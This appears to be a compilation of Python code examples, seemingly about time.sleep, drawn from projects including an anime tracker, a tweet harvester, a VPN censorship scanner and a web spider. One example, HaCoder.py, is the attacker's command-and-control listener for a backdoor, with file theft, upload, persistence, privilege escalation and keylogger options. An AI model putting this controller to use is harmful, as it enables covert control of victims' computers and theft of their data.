                    print('No results found, searching online..')
                    online = True
                    repeat = True
                    continue

                if not online:
                    print(COLORS.bold + '[O] ' + COLORS.default + 'Search online')
                print(COLORS.bold + '[C] ' + COLORS.default + 'Cancel')
                accepted = False
                while accepted == False:
                    which = input(
                        COLORS.bold + 'Choose> ' + COLORS.default).replace('\n', '')
                    if which.lower() == 'o':
                        online = True
                        repeat = True
                        accepted = True
                    elif which.lower() == 'c':
                        print('')
                        accepted = True
                    elif which.isdigit():
                        if int(which) <= len(search_results):
                            search_picked = search_results[int(which)]
                            if entry_type in ['anime', 'manga']:
                                deep = ANN.details(search_picked['id'], entry_type)
                            elif entry_type == 'vn':
                                deep = VNDB.get(
                                    'vn', 'basic,details', '(id=' +\
                                     str(search_picked['id']) + ')', '')['items'][0]
                            accepted = True

            if which.lower() == 'c': continue
            genre = ''
            if which == 'n':
                genre = input(
                    COLORS.bold + '<Genre> ' + COLORS.default).replace('\n', '')
            elif entry_type != 'vn':
                genres = ''
                for genre in deep['genres']:
                    genres = genres + genre + '/'
                genre = genres[:-1]

            if which != 'n':
                title = deep['title']

            status = ''
            while (status in ['c', 'w', 'h', 'q', 'd']) == False:
                status = input(COLORS.bold + '<Status> ' + COLORS.default +
                                   COLORS.header + '[C/W/H/Q/D] ' +\
                                   COLORS.default).lower()[0]

            if status != 'w' and entry_type != 'vn':
                last_ep = input(
                    COLORS.bold + '<Last episode watched> ' +\
                    COLORS.default).replace('\n', '')
            else:
                if entry_type == "anime":
                    last_ep = str(deep['episodes'])
                elif entry_type == "manga":
                    last_ep = str(deep['episodes'])
                else:
                    last_ep = ''

            obs = input(
                COLORS.bold + '<Observations> ' +\
                COLORS.default).replace('\n', '')

            try:
                dbs[currentdb].dictionary['count'] += 1
            except AttributeError:
                dbs[currentdb].dictionary['count'] = 1
            dbs[currentdb].dictionary['items'].append({'id': dbs[currentdb
             ].dictionary['count'], 'type': entry_type,
             'aid': search_picked['id'],
             'name': utils.HTMLEntitiesToUnicode(
              utils.remove_html_tags(title)), 'genre':
	          utils.HTMLEntitiesToUnicode(utils.remove_html_tags(genre)),
              'status': status, 'lastwatched': last_ep, 'obs': obs})
            rebuild_ids(dbs[currentdb])
            print(COLORS.green + 'Entry added' + COLORS.default + '\n')
        elif cmdsplit[0] == '':
            continue
        else:
            print(COLORS.warning + 'Command not recognized' + COLORS.default)
            continue
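
In the Futaam example, time.sleep serves two purposes: short pauses around the rTorrent XML-RPC calls give the daemon time to register the new torrent, and a one-second loop polls libtorrent's status and redraws the progress line until the download finishes. A simplified sketch of that poll-and-redraw idiom (is_finished and get_progress are hypothetical stand-ins for the real status calls):

import sys
import time

state = {'done': 0}

def get_progress(state):
    state['done'] += 25          # pretend 25% completes per poll
    return state['done']

def is_finished(state):
    return state['done'] >= 100

while not is_finished(state):
    progress = get_progress(state)
    sys.stdout.write('\r%3d%% complete' % progress)
    sys.stdout.flush()
    time.sleep(1)                # poll once per second, as in the example
print('')
print('Done')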

Example 29

Project: osrframework
Source File: twitter_api.py
View license
    def get_all_docs(self, screen_name):
        '''
            Method to get all the tweets emitted by a user.
            
            :param screen_name: The Twitter username.

            :return:    List of tweets.            
        '''
        def _getNewTweets(api, screen_name,count=200, oldest=None, waitTime=60):
            '''
                Method that recovers the new tweets, or waits until the API rate limit frees up more calls.
                
                :param api:     A valid and connected api.
                :param screen_name: screen_name of the user to monitor.
                :param count:   Number of tweets to grab per iteration.
                :param oldest: Oldest tweet to grab in this iteration.
                :param waitTime:    Number of seconds to wait between tries.
                                                                                
                :return:  List of new_tweets
            '''
            # Verifying the limits of the API
            #self._rate_limit_status(api=api, mode="get_all_docs")         
               
            waiting = True
            while waiting == True:
                try:
                    if oldest != None:
                        # We have to update the oldest id 
                        new_tweets = api.user_timeline(screen_name=screen_name, count=count, max_id=oldest)
                    else:
                        new_tweets = api.user_timeline(screen_name=screen_name, count=count)                        
                    waiting = False
                    #save most recent tweets

                except Exception as e:
                    # Error... We will have to wait
                    #waiting = True
                    print str(e)
                    #print(traceback.format_exc())                    
                    print "No more queries remaining, sleeping for " + str(waitTime) +" seconds..."
                    time.sleep(waitTime)          
                    
            return new_tweets
        
        # Connecting to the API
        api = self._connectToAPI()
    
        #initialize a list to hold all the tweepy Tweets
        alltweets = []    

        #make initial request for most recent tweets (200 is the maximum allowed count)
        """waiting = True
        while waiting == True:
            try:
                new_tweets = api.user_timeline(screen_name = screen_name,count=200)
                waiting = False
            except:
                # Error... We will have to wait
                waiting = True
                time.sleep(waitTime)  """         
        new_tweets = _getNewTweets(api, screen_name)
                
        alltweets.extend(new_tweets)
        # Storing manually all the json representation for the tweets        
        jTweets = []
        for n in new_tweets:
            jTweets.append(n._json)
        if len(alltweets) > 0:
            #save the id of the oldest tweet less one
            oldest = alltweets[-1].id - 1
        
            #keep grabbing tweets until there are no tweets left to grab
            while len(new_tweets) > 0:
                print "Getting tweets before %s" % (oldest)
            
                """ #all subsequent requests use the max_id param to prevent duplicates
                waiting = True
                while waiting == True:
                    try:
                        # We have to update the oldest id 
                        new_tweets = api.user_timeline(screen_name = screen_name,count=200, max_id=oldest)
                        waiting = False
                        #save most recent tweets

                    except:
                        # Error... We will have to wait
                        waiting = True
                        print "No more queries remaining, sleeping for " + str(waitTime) +" seconds..."
                        time.sleep(waitTime)  """

                new_tweets = _getNewTweets(api, screen_name, oldest=oldest)
                                 
                # Extending the list of tweets
                alltweets.extend(new_tweets)                                                                 
    
                #update the id of the oldest tweet less one
                oldest = alltweets[-1].id - 1        
                print "... %s tweets downloaded so far" % (len(alltweets))
                # Storing manually all the json representation for the tweets        
                for n in new_tweets:
                    jTweets.append(n._json)
        else:
            # Verifying the limits of the API
            print json.dumps(self._rate_limit_status(api=api, mode="get_all_docs"), indent =2)
            
        #transform the tweepy tweets into a 2D array that will populate the csv    
        outtweets = []      
        # This is how it is represented
        """
          "status": {
            "lang": "es", 
            "favorited": false, 
            "entities": {
              "symbols": [], 
              "user_mentions": [], 
              "hashtags": [], 
              "urls": []
            }, 
            "contributors": null, 
            "truncated": false, 
            "text": "Podemos confirmar que Alpify, aunque acabe en ...fy no es una aplicaci\u00f3n nuestra. ;) \u00a1A aprovechar lo que queda de domingo!", 
            "created_at": "Sun Aug 16 17:35:37 +0000 2015", 
            "retweeted": true, 
            "in_reply_to_status_id_str": null, 
            "coordinates": null, 
            "in_reply_to_user_id_str": null, 
            "source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>", 
            "in_reply_to_status_id": null, 
            "in_reply_to_screen_name": null, 
            "id_str": "632968969662689280", 
            "place": null, 
            "retweet_count": 1, 
            "geo": null, 
            "id": 632968969662689280, 
            "favorite_count": 0, 
            "in_reply_to_user_id": null
          },         
        """
        for tweet in jTweets:
            row =[]
            row.append(tweet["id_str"])
            row.append(tweet["created_at"])
            row.append(tweet["text"].encode("utf-8"))
            row.append(tweet["source"])
            row.append(tweet["coordinates"])
            row.append(tweet["retweet_count"])
            row.append(tweet["favorite_count"])
            row.append(tweet["lang"])
            row.append(tweet["place"])
            row.append(tweet["geo"])
            row.append(tweet["id"])
            row.append(screen_name)
            
            # URLS
            urls = []      
            """
            [    
                {
                  "url": "http://t.co/SGty7or6SQ", 
                  "indices": [
                    30, 
                    52
                  ], 
                  "expanded_url": "http://github.com/i3visio/osrframework", 
                  "display_url": "github.com/i3visio/osrfra\u2026"
                }
            ]
            """                             
            for u in tweet["entities"]["urls"]:
                urls.append(u["expanded_url"])
            # Creating the string value for the cell
            str_urls =""
            if len(urls) == 0:
                str_urls = "[N/A]"
            else:
                for i, u in enumerate(urls):
                    str_urls += u
                    # Appending a separator
                    if i+1 <> len(urls):
                        str_urls+= "|"
            row.append(str_urls.encode('utf-8'))  

            # TODO: Extract Mentions
            #     
            mentions = []
            """ "user_mentions": [
              {
                "id": 66345537, 
                "indices": [
                  0, 
                  10
                ], 
                "id_str": "66345537", 
                "screen_name": "muchotomy", 
                "name": "Tomy"
              },    
            """
            for a in tweet["entities"]["user_mentions"]:
                mentions.append(a["screen_name"])
            # Creating the string value for the cell
            str_mentions =""
            if len(mentions) == 0:
                str_mentions = "[N/A]"
            else:
                for i, m in enumerate(mentions):
                    str_mentions += m
                    # Appending a separator
                    if i+1 <> len(mentions):
                        str_mentions+= "|"
            row.append(str_mentions.encode('utf-8'))  
            
            # Appending the row to the output
            outtweets.append(row)
            
        # Writing the csv    
        with open('%s_tweets.csv' % screen_name, 'wb') as f:
            writer = csv.writer(f)
            # Writing the headers
            writer.writerow([
                "_tweet_id",
                "_tweet_created_at",
                "_tweet_text",
                "_tweet_source",
                "_tweet_coordinates",
                "_tweet_retweet_count",
                "_tweet_favourite_count",                                                
                "_tweet_lang",
                "i3visio_location",
                "_tweet_geo",
                "_twitter_id",
                "i3visio_alias",
                "i3visio_uri",                                                                                
                "i3visio_alias_mentions",                  
            ])
            # Writing the rows
            #writer.writerows(outtweets)
            for o in outtweets:
                try:
                    writer.writerow(o)
                except:
                    print o
    
        return jTweets
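
The retry loop in _getNewTweets above boils down to a fixed-delay retry: every failure is treated as a rate-limit error, so the code sleeps for waitTime seconds and tries again, indefinitely. A minimal, self-contained sketch of that idiom (not part of osrframework; fetch_page is a placeholder for any API call, and this version caps the number of attempts instead of retrying forever):

import time

def fetch_with_retry(fetch_page, wait_time=60, max_attempts=10):
    # Call fetch_page() until it succeeds, sleeping between failed attempts.
    # fetch_page is any zero-argument callable that raises on a rate-limit
    # error; purely illustrative, not osrframework's API.
    for attempt in range(1, max_attempts + 1):
        try:
            return fetch_page()
        except Exception as exc:
            if attempt == max_attempts:
                raise
            print("Attempt %d failed (%s), sleeping %d seconds..."
                  % (attempt, exc, wait_time))
            time.sleep(wait_time)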

Example 30

Project: centinel
Source File: cli.py
View license
def scan_vpns(directory, auth_file, crt_file, tls_auth, key_direction,
              exclude_list, shuffle_lists, vm_num, vm_index, reduce_vp):
    """
    For each VPN, check if there are experiments and scan with it if
    necessary

    Note: the expected directory structure is
    args.directory
    -----vpns (contains the OpenVPN config files)
    -----configs (contains the Centinel config files)
    -----exps (contains the experiments directories)

    :param directory: root directory that contains vpn configs and
                      centinel client configs
    :param auth_file: a text file with username at first line and
                      password at second line
    :param crt_file: optional root certificate file
    :param tls_auth: additional key
    :param key_direction: must specify if tls_auth is used
    :param exclude_list: optional list of excluded countries
    :param shuffle_lists: shuffle vpn list if set true
    :param vm_num: number of VMs that are running currently
    :param vm_index: index of current VM
    :param reduce_vp: reduce number of vantage points
    :return:
    """

    logging.info("Starting to run the experiments for each VPN")
    logging.warn("Excluding vantage points from: %s" % exclude_list)

    # iterate over each VPN
    vpn_dir = return_abs_path(directory, "vpns")
    conf_dir = return_abs_path(directory, "configs")
    home_dir = return_abs_path(directory, "home")
    if auth_file is not None:
        auth_file = return_abs_path(directory, auth_file)
    if crt_file is not None:
        crt_file = return_abs_path(directory, crt_file)
    if tls_auth is not None:
        tls_auth = return_abs_path(directory, tls_auth)
    conf_list = sorted(os.listdir(conf_dir))

    # determine VPN provider
    vpn_provider = None
    if "hma" in directory:
        vpn_provider = "hma"
    elif "ipvanish" in directory:
        vpn_provider = "ipvanish"
    elif "purevpn" in directory:
        vpn_provider = "purevpn"
    elif "vpngate" in directory:
        vpn_provider = "vpngate"
    if vpn_provider:
        logging.info("Detected VPN provider is %s" % vpn_provider)
    else:
        logging.warning("Cannot determine VPN provider!")

    # reduce size of list if reduce_vp is true
    if reduce_vp:
        logging.info("Reducing list size. Original size: %d" % len(conf_list))
        country_asn_set = set()
        reduced_conf_set = set()
        for filename in conf_list:
            centinel_config = os.path.join(conf_dir, filename)
            config = centinel.config.Configuration()
            config.parse_config(centinel_config)
            vp_ip = os.path.splitext(filename)[0]

            try:
                meta = centinel.backend.get_meta(config.params, vp_ip)
                if 'country' in meta and 'as_number' in meta \
                        and meta['country'] and meta['as_number']:
                    country_asn = '_'.join([meta['country'], meta['as_number']])
                    if country_asn not in country_asn_set:
                        country_asn_set.add(country_asn)
                        reduced_conf_set.add(filename)
                else:
                    # run this endpoint if missing info
                    reduced_conf_set.add(filename)
            except:
                logging.warning("Failed to geolocate %s" % vp_ip)
                reduced_conf_set.add(filename)

        conf_list = list(reduced_conf_set)
        logging.info("List size reduced. New size: %d" % len(conf_list))

    # sort file list to ensure the same filename sequence in each VM
    conf_list = sorted(conf_list)

    # only select its own portion according to vm_num and vm_index
    chunk_size = len(conf_list) / vm_num
    last_chunk_additional = len(conf_list) % vm_num
    start_pointer = 0 + (vm_index - 1) * chunk_size
    end_pointer = start_pointer + chunk_size
    if vm_index == vm_num:
        end_pointer += last_chunk_additional
    conf_list = conf_list[start_pointer:end_pointer]

    if shuffle_lists:
        shuffle(conf_list)

    number = 1
    total = len(conf_list)

    external_ip = get_external_ip()
    if external_ip is None:
        logging.error("No network connection, exiting...")
        return

    # getting nameservers that should be excluded
    local_nameservers = dns.resolver.Resolver().nameservers

    for filename in conf_list:
        # Check network connection first
        time.sleep(5)
        logging.info("Checking network connectivity...")
        current_ip = get_external_ip()
        if current_ip is None:
            logging.error("Network connection lost!")
            break
        elif current_ip != external_ip:
            logging.error("VPN still connected! IP: %s" % current_ip)
            if len(openvpn.OpenVPN.connected_instances) == 0:
                logging.error("No active OpenVPN instance found! Exiting...")
                break
            else:
                logging.warn("Trying to disconnect VPN")
                for instance in openvpn.OpenVPN.connected_instances:
                    instance.stop()
                    time.sleep(5)

                current_ip = get_external_ip()
                if current_ip is None or current_ip != external_ip:
                    logging.error("Stopping VPN failed! Exiting...")
                    break

            logging.info("Disconnecting VPN successfully")

        # start centinel for this endpoint
        logging.info("Moving onto (%d/%d) %s" % (number, total, filename))

        number += 1
        vpn_config = os.path.join(vpn_dir, filename)
        centinel_config = os.path.join(conf_dir, filename)

        # before starting the VPN, check if there are any experiments
        # to run
        config = centinel.config.Configuration()
        config.parse_config(centinel_config)

        # assuming that each VPN config file has a name like:
        # [ip-address].ovpn, we can extract IP address from filename
        # and use it to geolocate and fetch experiments before connecting
        # to VPN.
        vpn_address, extension = os.path.splitext(filename)
        country = None
        try:
            meta = centinel.backend.get_meta(config.params,
                                             vpn_address)
            if 'country' in meta:
                country = meta['country']
        except:
            logging.exception("%s: Failed to geolocate %s" % (filename, vpn_address))

        if country and exclude_list and country in exclude_list:
            logging.info("%s: Skipping this server (%s)" % (filename, country))
            continue

        # try setting the VPN info (IP and country) to get appropriate
        # experiments and input data.
        try:
            centinel.backend.set_vpn_info(config.params, vpn_address, country)
        except Exception as exp:
            logging.exception("%s: Failed to set VPN info: %s" % (filename, exp))

        logging.info("%s: Synchronizing." % filename)
        try:
            centinel.backend.sync(config.params)
        except Exception as exp:
            logging.exception("%s: Failed to sync: %s" % (filename, exp))

        if not experiments_available(config.params):
            logging.info("%s: No experiments available." % filename)
            try:
                centinel.backend.set_vpn_info(config.params, vpn_address, country)
            except Exception as exp:
                logging.exception("Failed to set VPN info: %s" % exp)
            continue

        # add exclude_nameservers to scheduler
        sched_path = os.path.join(home_dir, filename, "experiments", "scheduler.info")
        if os.path.exists(sched_path):
            with open(sched_path, 'r+') as f:
                sched_info = json.load(f)
                for task in sched_info:
                    if "python_exps" in sched_info[task] and "baseline" in sched_info[task]["python_exps"]:
                        if "params" in sched_info[task]["python_exps"]["baseline"]:
                            sched_info[task]["python_exps"]["baseline"]["params"]["exclude_nameservers"] = \
                                local_nameservers
                        else:
                            sched_info[task]["python_exps"]["baseline"]["params"] = \
                                {"exclude_nameservers": local_nameservers}

                # write back to same file
                f.seek(0)
                json.dump(sched_info, f, indent=2)
                f.truncate()

        logging.info("%s: Starting VPN." % filename)

        vpn = openvpn.OpenVPN(timeout=60, auth_file=auth_file, config_file=vpn_config,
                              crt_file=crt_file, tls_auth=tls_auth, key_direction=key_direction)

        vpn.start()
        if not vpn.started:
            logging.error("%s: Failed to start VPN!" % filename)
            vpn.stop()
            time.sleep(5)
            continue

        logging.info("%s: Running Centinel." % filename)
        try:
            client = centinel.client.Client(config.params, vpn_provider)
            centinel.conf = config.params
            # do not use client logging config
            # client.setup_logging()
            client.run()
        except Exception as exp:
            logging.exception("%s: Error running Centinel: %s" % (filename, exp))

        logging.info("%s: Stopping VPN." % filename)
        vpn.stop()
        time.sleep(5)

        logging.info("%s: Synchronizing." % filename)
        try:
            centinel.backend.sync(config.params)
        except Exception as exp:
            logging.exception("%s: Failed to sync: %s" % (filename, exp))

        # try setting the VPN info (IP and country) to the correct address
        # after sync is over.
        try:
            centinel.backend.set_vpn_info(config.params, vpn_address, country)
        except Exception as exp:
            logging.exception("Failed to set VPN info: %s" % exp)

Example 31

Project: grab
Source File: base.py
View license
    def run(self):
        """
        Main method. All work is done here.
        """
        if self.mp_mode:
            from multiprocessing import Process, Event, Queue
        else:
            from multiprocessing.dummy import Process, Event, Queue

        self.timer.start('total')
        self.transport = MulticurlTransport(self.thread_number)

        if self.http_api_port:
            http_api_proc = self.start_api_thread()
        else:
            http_api_proc = None

        self.parser_result_queue = Queue()
        self.parser_pipeline = ParserPipeline(
            bot=self,
            mp_mode=self.mp_mode,
            pool_size=self.parser_pool_size,
            shutdown_event=self.shutdown_event,
            network_result_queue=self.network_result_queue,
            parser_result_queue=self.parser_result_queue,
            requests_per_process=self.parser_requests_per_process,
        )
        network_result_queue_limit = max(10, self.thread_number * 2)
        
        try:
            # Run custom things defined by this specific spider
            # By default it does nothing
            self.prepare()

            # Setup task queue if it has not been configured yet
            if self.task_queue is None:
                self.setup_queue()

            # Initiate task generator. Only in main process!
            with self.timer.log_time('task_generator'):
                self.start_task_generators()

            # Work in an infinite cycle while the
            # `self.work_allowed` flag is True
            #shutdown_countdown = 0 # !!!
            pending_tasks = deque()
            while self.work_allowed:
                free_threads = self.transport.get_free_threads_number()
                # Load new task only if:
                # 1) network transport has free threads
                # 2) network result queue is not full
                # 3) cache is disabled OR cache has free resources
                if (self.transport.get_free_threads_number()
                        and (self.network_result_queue.qsize()
                             < network_result_queue_limit)
                        and (self.cache_pipeline is None
                             or self.cache_pipeline.has_free_resources())):
                    if pending_tasks:
                        task = pending_tasks.popleft()
                    else:
                        task = self.get_task_from_queue()
                    if task is None:
                        # If received task is None then
                        # check if spider is ready to be shut down
                        if not pending_tasks and self.is_ready_to_shutdown():
                            # I am afraid there is a bug in `is_ready_to_shutdown`
                            # because it tries to evaluate too many things,
                            # including things that are being set from other threads,
                            # so to ensure we are really ready to shut down I call
                            # is_ready_to_shutdown a few more times.
                            # Without this hack, very rarely, Grab fails to do
                            # its job.
                            # A good way to see this bug is to disable this hack
                            # and run:
                            # while ./runtest.py -t test.spider_data; do echo "ok"; done;
                            # and wait a few minutes.
                            really_ready = True
                            for x in range(10):
                                if not self.is_ready_to_shutdown():
                                    really_ready = False
                                    break
                                time.sleep(0.001)
                            if really_ready:
                                self.shutdown_event.set()
                                self.stop()
                                break # Break from `while self.work_allowed` cycle
                    elif isinstance(task, bool) and (task is True):
                        # If received task is True
                        # and there is no active network threads then
                        # take some sleep
                        if not self.transport.get_active_threads_number():
                            time.sleep(0.01)
                    else:
                        logger_verbose.debug('Got new task from task queue: %s'
                                             % task)
                        task.network_try_count += 1
                        is_valid, reason = self.check_task_limits(task)
                        if is_valid:
                            task_grab = self.setup_grab_for_task(task)
                            if self.cache_pipeline:
                                self.cache_pipeline.input_queue.put(
                                    ('load', (task, task_grab)),
                                )
                            else:
                                self.submit_task_to_transport(task, task_grab)
                        else:
                            self.log_rejected_task(task, reason)
                            handler = task.get_fallback_handler(self)
                            if handler:
                                handler(task)

                with self.timer.log_time('network_transport'):
                    logger_verbose.debug('Asking transport layer to do '
                                         'something')
                    self.transport.process_handlers()

                logger_verbose.debug('Processing network results (if any).')

                # Collect completed network results
                # Each result could be valid or failed
                # Result is dict {ok, grab, grab_config_backup, task, emsg}
                results = [(x, False) for x in
                           self.transport.iterate_results()]
                if self.cache_pipeline:
                    while True:
                        try:
                            action, result = self.cache_pipeline\
                                                 .result_queue.get(False)
                        except queue.Empty:
                            break
                        else:
                            assert action in ('network_result', 'task')
                            if action == 'network_result':
                                results.append((result, True))
                            elif action == 'task':
                                task = result
                                task_grab = self.setup_grab_for_task(task)
                                if (self.transport.get_free_threads_number()
                                        and (self.network_result_queue.qsize()
                                             < network_result_queue_limit)):
                                    self.submit_task_to_transport(task, task_grab)
                                else:
                                    pending_tasks.append(task)

                # Take sleep to avoid millions of iterations per second.
                # 1) If no results from network transport
                # 2) If task queue is empty (or if there are only delayed tasks)
                # 3) If no network activity
                # 4) If parser result queue is empty
                if (not results
                    and (task is None or bool(task) == True)
                    and not self.transport.get_active_threads_number()
                    and not self.parser_result_queue.qsize()
                    and (self.cache_pipeline is None
                         or (self.cache_pipeline.input_queue.qsize() == 0
                             and self.cache_pipeline.is_idle()
                             and self.cache_pipeline.result_queue.qsize() == 0))
                    ):
                        time.sleep(0.001)

                for result, from_cache in results:
                    if self.cache_pipeline and not from_cache:
                        if result['ok']:
                            self.cache_pipeline.input_queue.put(
                                ('save', (result['task'], result['grab']))
                            )
                    self.log_network_result_stats(
                        result, from_cache=from_cache)
                    if self.is_valid_network_result(result):
                        #print('!! PUT NETWORK RESULT INTO QUEUE (base.py)')
                        self.network_result_queue.put(result)
                    else:
                        self.log_failed_network_result(result)
                        # Try to do network request one more time
                        if self.network_try_limit > 0:
                            result['task'].refresh_cache = True
                            result['task'].setup_grab_config(
                                result['grab_config_backup'])
                            self.add_task(result['task'])
                    if from_cache:
                        self.stat.inc('spider:task-%s-cache' % result['task'].name)
                    self.stat.inc('spider:request')

                while True:
                    try:
                        p_res, p_task = self.parser_result_queue.get(block=False)
                    except queue.Empty:
                        break
                    else:
                        self.stat.inc('spider:parser-result')
                        self.process_handler_result(p_res, p_task)

                if not self.shutdown_event.is_set():
                    self.parser_pipeline.check_pool_health()

            logger_verbose.debug('Work done')
        except KeyboardInterrupt:
            logger.info('\nGot ^C signal in process %d. Stopping.'
                        % os.getpid())
            self.interrupted = True
            raise
        finally:
            # This code is executed when the main cycle is broken
            self.timer.stop('total')
            self.stat.print_progress_line()
            self.shutdown()

            # Stop HTTP API process
            if http_api_proc:
                http_api_proc.server.shutdown()
                http_api_proc.join()

            if self.task_queue:
                self.task_queue.clear()

            # Stop parser processes
            self.shutdown_event.set()
            self.parser_pipeline.shutdown()
            logger.debug('Main process [pid=%s]: work done' % os.getpid())
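
The shutdown check above re-evaluates is_ready_to_shutdown() several times with a 1 ms sleep in between, because the flag depends on state mutated by other threads. The same "confirm it stays true" idiom in isolation (a sketch; is_ready is a stand-in predicate, not Grab's actual method):

import time

def confirmed(is_ready, checks=10, delay=0.001):
    # Return True only if is_ready() holds across several samples.
    # Repeated sampling with a short sleep guards against a flag that
    # flickers true while other threads are still producing work.
    for _ in range(checks):
        if not is_ready():
            return False
        time.sleep(delay)
    return True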

Example 33

Project: HaCoder.py
Source File: HaCoder.py
View license
def globalhandler():
	# clear function
	##################################
	# Windows ---------------> cls
	# Linux   ---------------> clear
	if os.name == 'posix': clf = 'clear'
	if os.name == 'nt': clf = 'cls'
	clear = lambda: os.system(clf)
	clear()

	BLOCK_SIZE=32
	PADDING = '{'
	pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
	EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
	DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

	# initialize socket
	c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	c.bind(('0.0.0.0', portH))
	c.listen(128)

	# client information
	active = False
	clients = []
	socks = []
	interval = 0.8

	# Functions
	###########

	# send data
	def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
		sock.sendall(EncodeAES(cipher, cmd + end))

	# receive data
	def Receive(sock, end="EOFEOFEOFEOFEOFX"):
		data = ""
		l = sock.recv(1024)
		while(l):
			decrypted = DecodeAES(cipher, l)

			data += decrypted
			if data.endswith(end) == True:
				break
			else:
				l = sock.recv(1024)
		return data[:-len(end)]

	# download file
	def download(sock, remote_filename, local_filename=None):
		# check if file exists
		if not local_filename:
			local_filename = remote_filename
		try:
			f = open(local_filename, 'wb')
		except IOError:
			print "Error opening file.\n"
			Send(sock, "cd .")
			return
		# start transfer
		Send(sock, "download "+remote_filename)
		print "Downloading: " + remote_filename + " > " + local_filename
		fileData = Receive(sock)
		f.write(fileData)
		time.sleep(interval)
		f.close()
		time.sleep(interval)

	# upload file
	def upload(sock, local_filename, remote_filename=None):
		# check if file exists
		if not remote_filename:
			remote_filename = local_filename
		try:
			g = open(local_filename, 'rb')
		except IOError:
			print "Error opening file.\n"
			Send(sock, "cd .")
			return
		# start transfer
		Send(sock, "upload "+remote_filename)
		print 'Uploading: ' + local_filename + " > " + remote_filename
		while True:
			fileData = g.read()
			if not fileData: break
			Send(sock, fileData, "")
		g.close()
		time.sleep(interval)
		Send(sock, "")
		time.sleep(interval)
	
	# refresh clients
	def refresh():
		clear()
		print bcolors.OKGREEN + '\nListening for bots...\n' + bcolors.ENDC
		if len(clients) > 0:
			for j in range(0,len(clients)):
				print '[' + str((j+1)) + '] Client: ' + clients[j] + '\n'
		else:
			print "...\n"
		# print exit option
		print "---\n"
		print bcolors.FAIL + "[0] Exit \n" + bcolors.ENDC
		print bcolors.WARNING + "\nPress Ctrl+C to interact with client." + bcolors.ENDC
		print bcolors.OKGREEN

	# main loop
	while True:
		refresh()
		# listen for clients
		try:
			# set timeout
			c.settimeout(10)
		
			# accept connection
			try:
				s,a = c.accept()
			except socket.timeout:
				continue
		
			# add socket
			if (s):
				s.settimeout(None)
				socks += [s]
				clients += [str(a)]
		
			# display clients
			refresh()
		
			# sleep
			time.sleep(interval)

		except KeyboardInterrupt:
		
			# display clients
			refresh()
		
			# accept selection --- int, 0/1-128
			activate = input("\nEnter option: ")
		
			# exit
			if activate == 0:
				print '\nExiting...\n'
				for j in range(0,len(socks)):
					socks[j].close()
				sys.exit()
		
			# subtract 1 (array starts at 0)
			activate -= 1
	
			# clear screen
			clear()
		
			# create a cipher object using the random secret
			cipher = AES.new(secret)
			print '\nActivating client: ' + clients[activate] + '\n'
			print "download	Download files from Client"
			print "downhttp	Download file to victim using HTTP"
			print "upload		Upload files from attacker to Client"
			print "persist		Make backdoor run on startup"
			print "privs		Privilege Escalation"
			print "keylog		Activate Keylogger"

			active = True
			Send(socks[activate], 'Activate')
		print bcolors.ENDC
		# interact with client
		while active:
			try:
				# receive data from client
				data = Receive(socks[activate])
			# disconnect client.
			except:
				print '\nClient disconnected... ' + clients[activate]
				# delete client
				socks[activate].close()
				time.sleep(0.8)
				socks.remove(socks[activate])
				clients.remove(clients[activate])
				refresh()
				active = False
				break

			# exit client session
			if data == 'quitted':
				# print message
				print "Exit.\n"
				# remove from arrays
				socks[activate].close()
				socks.remove(socks[activate])
				clients.remove(clients[activate])
				# sleep and refresh
				time.sleep(0.8)
				refresh()
				active = False
				break
			# if data exists
			elif data != '':
				# get next command
				sys.stdout.write(data)
				nextcmd = raw_input()
		
			# download
			if nextcmd.startswith("download ") == True:
				if len(nextcmd.split(' ')) > 2:
					download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
				else:
					download(socks[activate], nextcmd.split(' ')[1])
		
			# upload
			elif nextcmd.startswith("upload ") == True:
				if len(nextcmd.split(' ')) > 2:
					upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
				else:
					upload(socks[activate], nextcmd.split(' ')[1])
		
			# normal command
			elif nextcmd != '':
				Send(socks[activate], nextcmd)

			elif nextcmd == '':

				print 'Think before you type. ;)\n'
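
Example 33 sprinkles time.sleep(interval) (0.8 s here) around socket transfers so the peer has time to finish reading before the next payload arrives. The pacing idea on its own, reduced to a sketch (send_paced and its arguments are illustrative; a real protocol would rely on acknowledgements rather than fixed pauses):

import time

def send_paced(sock, chunks, interval=0.8):
    # Send each chunk over sock, pausing between sends so a slow peer
    # can drain its buffer; sock is any object with a sendall() method.
    for chunk in chunks:
        sock.sendall(chunk)
        time.sleep(interval)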

Example 35

Project: AoikHotkey
Source File: sendkey_winos.py
View license
def keys_stroke(
    vks,
    vks_pressed=[],
    key_duration=None,
    key_interval=None,
    modifier_interval=None,
    release_initial_keys=True,
    restore_initial_modifiers=True,
):
    """
    Send keys, without being interfered by previously pressed modifier keys.

    :param vks: Virtual keys to send.

    :param vks_pressed: Virtual keys that are currently pressed.

    :param key_duration: Duration between sending key-down and key-up events \
        for a non-modifier key.

    :param key_interval: Interval between sending events for two consecutive
        non-modifier keys.

    :param modifier_interval: Delay between sending key-down events for two \
        consecutive modifier keys.

    :param release_initial_keys: Whether to send key-up events to release \
        non-modifier keys that were pressed before sending the keys. Notice
        that initial modifier keys will always be released to avoid interference.

    :param restore_initial_modifiers: Whether to send key-down events to press \
        modifier keys that were pressed before sending the keys.

    :return: None.
    """
    # Whether last virtual key is modifier.
    # Initial value being True is required by code at 2NG2A.
    last_vk_is_modifier = True

    # Group list.
    # Each group is a tuple of (modifier_s, non_modifier_s).
    group_s = []

    # Current group's modifier virtual key list
    modifier_s = []

    # Current group's non-modifier virtual key list
    non_modifier_s = []

    # Virtual key index
    vk_idx = 0

    # Virtual key list length
    vks_len = len(vks)

    # While have remaining virtual keys
    while vk_idx < vks_len:
        # Get a virtual key
        vk = vks[vk_idx]

        # Increment the virtual key index
        vk_idx += 1

        # 2NG2A
        # If last virtual key is not modifier,
        # it means the end of a group.
        if not last_vk_is_modifier:
            # Add the group's modifiers and non-modifiers to the group list
            group_s.append((modifier_s, non_modifier_s))

            # Set the modifier virtual key list be empty for next group
            modifier_s = []

            # Set the non-modifier virtual key list be empty for next group
            non_modifier_s = []

        # If the virtual key is modifier
        if vk in _MODIFIER_VKS:
